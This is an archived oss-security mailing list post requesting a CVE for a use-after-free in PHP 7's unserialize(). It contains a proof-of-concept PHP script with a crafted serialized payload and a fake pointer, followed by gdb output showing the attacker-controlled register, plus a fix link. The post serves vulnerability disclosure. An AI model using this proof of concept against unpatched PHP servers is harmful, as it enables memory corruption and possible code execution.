Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 13 Aug 2015 11:35:06 +0800
From: "牛保龙" <niubl@...wnsec.com>
To: "oss-security" <oss-security@...ts.openwall.com>
Subject: CVE request - php 7 use after free

Description: ------------ the Hash table is full, resize it,ZEND_HASH_IF_FULL_DO_RESIZE(ht),but if one elment is already allocate in the old memery and re-allocate in the new memry and the var_hash struct also exists the old memery for the element, it can cause a use after free when unserialize() function has r/R referer. my english is poor. i hope i can explain clearly to you. Test script: --------------- <?php $addr = 0x4141414141414141; $sf = new SoapFault('1', 'string', 'detail', 'header','line', str_repeat("A",232).ptr2str($addr)); $ob = unserialize("a:3:{i:0;".serialize($sf).'i:1;r:12;i:2;r:10;}'); //var_dump($ob); function ptr2str($ptr) {     $out = "";     for ($i=0; $i<8; $i++) {         $out .= chr($ptr & 0xff);         $ptr >>= 8;     }     return $out; } ?> Actual result: -------------- (gdb) disassemble $rip ……    0x000000000068cfe5 <+3109>:	cmp    $0xffffffffffffffff,%rsi    0x000000000068cfe9 <+3113>:	je     0x68c538 <php_var_unserialize_ex+376>    0x000000000068cfef <+3119>:	mov    (%rbx),%rdi    0x000000000068cff2 <+3122>:	callq  0x4276f3 <var_access>    0x000000000068cff7 <+3127>:	test   %rax,%rax    0x000000000068cffa <+3130>:	je     0x68c538 <php_var_unserialize_ex+376>    0x000000000068d000 <+3136>:	mov    (%rax),%rdx    0x000000000068d003 <+3139>:	mov    0x8(%rax),%eax    0x000000000068d006 <+3142>:	test   $0x4,%ah    0x000000000068d009 <+3145>:	mov    %rdx,(%r14)    0x000000000068d00c <+3148>:	mov    %eax,0x8(%r14)    0x000000000068d010 <+3152>:	je     0x68c62c <php_var_unserialize_ex+620> => 0x000000000068d016 <+3158>:	addl   $0x1,(%rdx)    0x000000000068d019 <+3161>:	mov    $0x1,%eax    0x000000000068d01e <+3166>:	jmpq   0x68c53a <php_var_unserialize_ex+378>    0x000000000068d023 <+3171>:	nopl   0x0(%rax,%rax,1)    0x000000000068d028 <+3176>:	cmp    $0x3a,%al    0x000000000068d02a <+3178>:	jne    0x68c538 <php_var_unserialize_ex+376>    0x000000000068d030 <+3184>:	cmpb   $0x22,0x2(%r12)    0x000000000068d036 <+3190>:	jne    0x68c538 <php_var_unserialize_ex+376>    0x000000000068d03c <+3196>:	lea    0x85e11d(%rip),%rax        # 0xeeb160 <zend_standard_class_def>    0x000000000068d043 <+3203>:	mov    %rbp,%rsi    0x000000000068d046 <+3206>:	mov    %r14,%rdi    0x000000000068d049 <+3209>:	mov    %r11,0x10(%rsp)    0x000000000068d04e <+3214>:	mov    (%rax),%rdx    0x000000000068d051 <+3217>:	callq  0x42773c <object_common1> (gdb) info reg rax            0x1400	5120 rbx            0x7fffb2f37fe0	140736195690464 rcx            0xb	11 rdx            0x4141414141414141	4702111234474983745 rsi            0x9	9 rdi            0x7f7d6f854820	140176718645280 rbp            0x7fffb2f37fd8	0x7fffb2f37fd8 rsp            0x7fffb2f37e40	0x7fffb2f37e40 r8             0x0	0 r9             0x652ec731c4b	6953224051787 r10            0x79812b	7962923 r11            0x0	0 r12            0x7f7d6f87b2b1	140176718803633 r13            0x72	114 r14            0x7f7d6f85ba60	140176718674528 r15            0x7f7d6f87b2b2	140176718803634 rip            0x68d016	0x68d016 <php_var_unserialize_ex+3158> eflags         0x10202	[ IF RF ] cs             0x33	51 ss             0x2b	43 ds             0x0	0 es             0x0	0 fs             0x0	0 gs             0x0	0 (gdb) bt #0  0x000000000068d016 in php_var_unserialize_ex (rval=rval@...ry=0x7f7d6f85ba60, p=p@...ry=0x7fffb2f37fd8, max=max@...ry=0x7f7d6f87b2b2 "", var_hash=var_hash@...ry=0x7fffb2f37fe0,      classes=classes@...ry=0x0) at /home/knownsec/Downloads/php-7.0.0beta2/ext/standard/var_unserializer.c:1246 #1  0x000000000068cd03 in process_nested_data (rval=0x7f7d6f85ba60, objprops=0, elements=0, ht=0x7f7d6f855348, classes=0x0, var_hash=0x7fffb2f37fe0, max=0x7f7d6f87b2b2 "", p=0x7fffb2f37fd8)     at /home/knownsec/Downloads/php-7.0.0beta2/ext/standard/var_unserializer.c:389 #2  php_var_unserialize_ex (rval=rval@...ry=0x7f7d6f812160, p=p@...ry=0x7fffb2f37fd8, max=0x7f7d6f87b2b2 "", var_hash=var_hash@...ry=0x7fffb2f37fe0, classes=classes@...ry=0x0)     at /home/knownsec/Downloads/php-7.0.0beta2/ext/standard/var_unserializer.c:870 #3  0x000000000067f0ed in zif_unserialize (execute_data=<optimized out>, return_value=0x7f7d6f812160) at /home/knownsec/Downloads/php-7.0.0beta2/ext/standard/var.c:1037 #4  0x00000000007510ed in ZEND_DO_ICALL_SPEC_HANDLER () at /home/knownsec/Downloads/php-7.0.0beta2/Zend/zend_vm_execute.h:577 #5  0x00000000007412ab in execute_ex (ex=<optimized out>) at /home/knownsec/Downloads/php-7.0.0beta2/Zend/zend_vm_execute.h:406 #6  0x000000000078d8ef in zend_execute (op_array=op_array@...ry=0x7f7d6f883000, return_value=return_value@...ry=0x0) at /home/knownsec/Downloads/php-7.0.0beta2/Zend/zend_vm_execute.h:450 #7  0x000000000070473e in zend_execute_scripts (type=type@...ry=8, retval=retval@...ry=0x0, file_count=file_count@...ry=3) at /home/knownsec/Downloads/php-7.0.0beta2/Zend/zend.c:1399 #8  0x00000000006a7710 in php_execute_script (primary_file=primary_file@...ry=0x7fffb2f3a510) at /home/knownsec/Downloads/php-7.0.0beta2/main/main.c:2475 #9  0x000000000078f163 in do_cli (argc=2, argv=0xff39f0) at /home/knownsec/Downloads/php-7.0.0beta2/sapi/cli/php_cli.c:971 #10 0x000000000042c520 in main (argc=2, argv=0xff39f0) at /home/knownsec/Downloads/php-7.0.0beta2/sapi/cli/php_cli.c:1338 


A fix has been committed:http://git.php.net/?p=php-src.git;a=commit;h=be54eb7db10c6aa838cef969822a5ae0f4e605e3


------------------
北京知道创宇信息技术有限公司
牛保龙(404实验室)地 址:北京市朝阳区阜安西路望京SOHO中心T3 A座15 层总 机:010-57076191    传  真:010-57076117手 机:13366466891      邮 编:100102网 址:www.knownsec.com

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.